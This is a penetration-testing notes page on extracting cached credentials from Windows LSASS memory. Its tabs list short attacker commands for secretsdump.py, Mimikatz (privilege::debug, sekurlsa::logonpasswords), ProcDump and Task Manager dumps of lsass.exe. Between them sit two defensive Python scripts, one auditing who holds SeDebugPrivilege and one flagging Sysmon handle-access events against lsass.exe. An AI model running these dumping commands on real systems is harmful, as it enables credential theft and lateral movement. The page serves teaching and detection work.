# LSASS Credentials

The Local Security Authority Subsystem Service (LSASS) process manages various security-related functions in Windows, such as user authentication.

{% hint style="info" %}
LSASS (lsass.exe) is a process that implements many functions of the Local Security Authority (LSA).
{% endhint %}

When a domain user performs an interactive logon (physically or via RDP) to a computer, the user's credentials get cached in the LSASS Process in order to use Single Sign-On (SSO) when a [network logon](https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/windows-logon-scenarios#BKMK_NetworkLogon) is required to access services on the domain.

{% hint style="info" %}
Users who authenticate to the computer over the network (an NTLM or Kerberos network logon) do not have their credentials cached on it unless Kerberos delegation is enabled.
{% endhint %}

To access the LSASS Process memory to extract credentials, you must have a user account with *SeDebugPrivilege* on the target Windows computer. Most of the time, this means that you have access to an account with local administrator privileges on the computer.

{% hint style="info" %}
*SeDebugPrivilege* gives the ability to inspect and manipulate any process on the system, regardless of ownership or permissions.
{% endhint %}
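Because *SeDebugPrivilege* is the gate to LSASS memory, auditing who actually holds it is a natural first check. The script below is an added example, not part of the original page: it parses the `[Privilege Rights]` section of a `secedit /export /cfg policy.inf` export (secedit writes that file as UTF-16LE; the excerpt here is constructed and already decoded) and reports every SID granted the right other than BUILTIN\Administrators.

```python
"""Report which accounts hold SeDebugPrivilege, from a secedit policy export.

Added example for this page, not part of the original. It assumes the export was
produced with `secedit /export /cfg policy.inf` and already decoded to text
(secedit writes UTF-16LE); the excerpt below is constructed.
"""
from __future__ import annotations

from typing import Dict, List, Tuple

# Constructed excerpt in the INI layout secedit emits; only [Privilege Rights] matters here.
SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeTcbPrivilege =
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Friendly names for the well-known SIDs this example reports on.
WELL_KNOWN_SIDS = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
}


def parse_privilege_rights(text: str) -> Dict[str, List[str]]:
    """Return {privilege name: [SIDs]} from the [Privilege Rights] section."""
    rights: Dict[str, List[str]] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # secedit prefixes each SID with '*'; an empty value means nobody holds the right.
        sids = [item.strip().lstrip("*") for item in value.split(",") if item.strip()]
        rights[name.strip()] = sids
    return rights


def unexpected_debug_holders(
    text: str, expected: Tuple[str, ...] = ("S-1-5-32-544",)
) -> List[Tuple[str, str]]:
    """SIDs granted SeDebugPrivilege beyond `expected`, paired with a display name."""
    holders = parse_privilege_rights(text).get("SeDebugPrivilege", [])
    return [
        (sid, WELL_KNOWN_SIDS.get(sid, "(unresolved; look up in AD)"))
        for sid in holders
        if sid not in expected
    ]


if __name__ == "__main__":
    for sid, name in unexpected_debug_holders(SAMPLE_EXPORT):
        print(f"SeDebugPrivilege granted outside Administrators: {sid} {name}")
```

Run against a real export, any domain SID in the output is a service account or group whose members can read LSASS on that host; the default on a workstation is Administrators only, so anything extra deserves a reason.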

There is a great deal of tooling and research on ways an attacker can dump the LSASS process. Dumping LSASS is a much larger topic than what is covered here, especially once you look into protections against LSASS dumping and EDR evasion.

Still, below are a few popular methods that may work in organizations that have never had a penetration test.

{% tabs %}
{% tab title="secretsdump.py" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux (Attacker)" %}

```bash
secretsdump.py [domain/]username[:password]@<computer> [options]

OPTIONS
-outputfile <file>          Base output filename
-hashes LMHASH:NTHASH       Authenticate using an NT/LM hash instead of a password
-k                          Use Kerberos authentication from a ccache file
```

{% endcode %}
{% endtab %}

{% tab title="Mimikatz" %}
{% embed url="https://github.com/gentilkiwi/mimikatz" %}

{% code title="Windows (Target Computer)" %}

```bash
## Run Mimikatz
mimikatz.exe

## Enable SeDebugPrivilege In Your Terminal
privilege::debug

## Dump LSASS Memory
sekurlsa::logonpasswords
```

{% endcode %}
{% endtab %}

{% tab title="Task Manager" %}
You can create a minidump of the *lsass.exe* process using the Task Manager running as administrator. Simply locate *lsass.exe*, right-click on it, and select *Create Dump File*. We can then use Mimikatz to read the dump.

{% code title="Linux/Windows" %}

```bash
## Switch Mimikatz context to the lsass.exe dump
sekurlsa::minidump [path to lsass dump]

## Dump Contents Of LSASS Dump
sekurlsa::logonpasswords
```

{% endcode %}
{% endtab %}

{% tab title="ProcDump" %}
{% embed url="https://learn.microsoft.com/en-us/sysinternals/downloads/procdump" %}

{% code title="Windows (Target Computer)" %}

```bash
## Dump LSASS Process
procdump.exe -accepteula -ma lsass.exe lsass.dmp

## Dump a clone of LSASS instead of the live process (-r, reflection)
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
```

{% endcode %}
{% endtab %}
{% endtabs %}
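Every method in the tabs above ends the same way: a process opens a handle to lsass.exe with enough access to read its memory. That is the detection point defenders rely on, and Sysmon Event ID 10 (ProcessAccess) records exactly that handle open with the source image and the granted access mask. The script below is an added example, not part of the original page or of any tool above: it parses constructed Event ID 10 messages in the field layout Sysmon uses, decodes the access mask into Win32 process rights, and flags accessors that could read LSASS memory. The allowlist of expected system accessors is an assumption to be tuned per environment.

```python
"""Flag handle opens on lsass.exe that could read its memory (Sysmon Event ID 10).

Added example for this page, not part of the original. The records below are
constructed in the field layout Sysmon uses for ProcessAccess events; the
allowlist EXPECTED_ACCESSORS is an assumption, not a vendor-supplied list.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Dict, List

# Win32 process access rights (from winnt.h) used to interpret GrantedAccess.
PROCESS_VM_READ = 0x0010
PROCESS_DUP_HANDLE = 0x0040
PROCESS_ALL_ACCESS = 0x1FFFFF
RIGHT_NAMES = {
    0x0001: "TERMINATE", 0x0002: "CREATE_THREAD", 0x0008: "VM_OPERATION",
    0x0010: "VM_READ", 0x0020: "VM_WRITE", 0x0040: "DUP_HANDLE",
    0x0080: "CREATE_PROCESS", 0x0100: "SET_QUOTA", 0x0200: "SET_INFORMATION",
    0x0400: "QUERY_INFORMATION", 0x0800: "SUSPEND_RESUME",
    0x1000: "QUERY_LIMITED_INFORMATION",
}

# Assumption: system processes that open lsass.exe as part of normal operation.
# Match on full path only as a starting point; verify the image signer in production.
EXPECTED_ACCESSORS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed Sysmon Event ID 10 messages, one record per blank-line-separated block.
SAMPLE_EVENTS = """\
Process accessed:
UtcTime: 2024-05-01 10:15:02.123
SourceImage: C:\\Windows\\System32\\csrss.exe
TargetImage: C:\\Windows\\System32\\lsass.exe
GrantedAccess: 0x1FFFFF

Process accessed:
UtcTime: 2024-05-01 10:16:44.501
SourceImage: C:\\Windows\\System32\\svchost.exe
TargetImage: C:\\Windows\\System32\\lsass.exe
GrantedAccess: 0x1000

Process accessed:
UtcTime: 2024-05-01 10:21:09.007
SourceImage: C:\\Windows\\System32\\Taskmgr.exe
TargetImage: C:\\Windows\\System32\\lsass.exe
GrantedAccess: 0x1FFFFF

Process accessed:
UtcTime: 2024-05-01 10:22:30.882
SourceImage: C:\\Users\\jdoe\\Downloads\\dumper.exe
TargetImage: C:\\Windows\\System32\\lsass.exe
GrantedAccess: 0x1010

Process accessed:
UtcTime: 2024-05-01 10:23:11.300
SourceImage: C:\\Users\\jdoe\\Downloads\\dumper.exe
TargetImage: C:\\Windows\\System32\\notepad.exe
GrantedAccess: 0x1FFFFF
"""


@dataclass
class Finding:
    time: str
    source: str
    mask: int
    rights: List[str]


def parse_events(text: str) -> List[Dict[str, str]]:
    """Split 'Field: value' message text into one dict per event."""
    events: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                events.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")  # first colon only; paths keep their own
        current[key.strip()] = value.strip()
    if current:
        events.append(current)
    return events


def decode_rights(mask: int) -> List[str]:
    """Name the individual rights in an access mask (ALL_ACCESS collapses to one name)."""
    if mask == PROCESS_ALL_ACCESS:
        return ["ALL_ACCESS"]
    return [name for bit, name in sorted(RIGHT_NAMES.items()) if mask & bit]


def can_read_memory(mask: int) -> bool:
    """True if the handle reads memory directly or can be duplicated into one that does."""
    return mask == PROCESS_ALL_ACCESS or bool(mask & (PROCESS_VM_READ | PROCESS_DUP_HANDLE))


def find_lsass_access(events: List[Dict[str, str]]) -> List[Finding]:
    """Return memory-capable handle opens on lsass.exe from non-allowlisted images."""
    findings: List[Finding] = []
    for ev in events:
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        source = ev.get("SourceImage", "")
        if source.lower() in EXPECTED_ACCESSORS:
            continue
        mask = int(ev.get("GrantedAccess", "0"), 16)  # int() accepts the 0x prefix
        if can_read_memory(mask):
            findings.append(Finding(ev.get("UtcTime", ""), source, mask, decode_rights(mask)))
    return findings


if __name__ == "__main__":
    for f in find_lsass_access(parse_events(SAMPLE_EVENTS)):
        print(f"{f.time}  {f.source}  0x{f.mask:X}  {'|'.join(f.rights)}")
```

On the constructed input this yields two findings (Taskmgr.exe with full access, and the downloaded binary with `VM_READ|QUERY_LIMITED_INFORMATION`, the 0x1010 mask a memory read needs) while the csrss.exe and query-only svchost.exe records are dropped. The same logic covers the Task Manager, ProcDump and Mimikatz paths on this page, since each must open that handle; pairing it with LSA protection (RunAsPPL) or Credential Guard on the host reduces what a successful read can recover.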
